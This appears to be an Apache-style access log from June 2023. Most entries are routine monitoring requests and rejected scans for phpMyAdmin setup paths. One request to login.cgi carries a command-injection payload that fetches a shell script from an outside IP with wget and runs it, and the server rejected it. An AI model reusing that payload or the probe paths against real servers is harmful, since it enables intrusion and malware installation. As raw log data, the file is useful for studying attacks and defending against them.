146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/webdb/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/websql/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/php/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 339 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/db/scripts/setup.php HTTP/1.0" 404 325 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/phpmanager/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
146.59.233.75 - - [07/Jun/2023:08:45:52 +0200] "GET http://212.91.246.85:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
212.91.246.72 - - [07/Jun/2023:08:46:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:47:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:48:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.167 - - [07/Jun/2023:08:48:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [07/Jun/2023:08:49:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [07/Jun/2023:08:50:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.183.156.161 - - [07/Jun/2023:08:50:40 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [07/Jun/2023:08:51:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
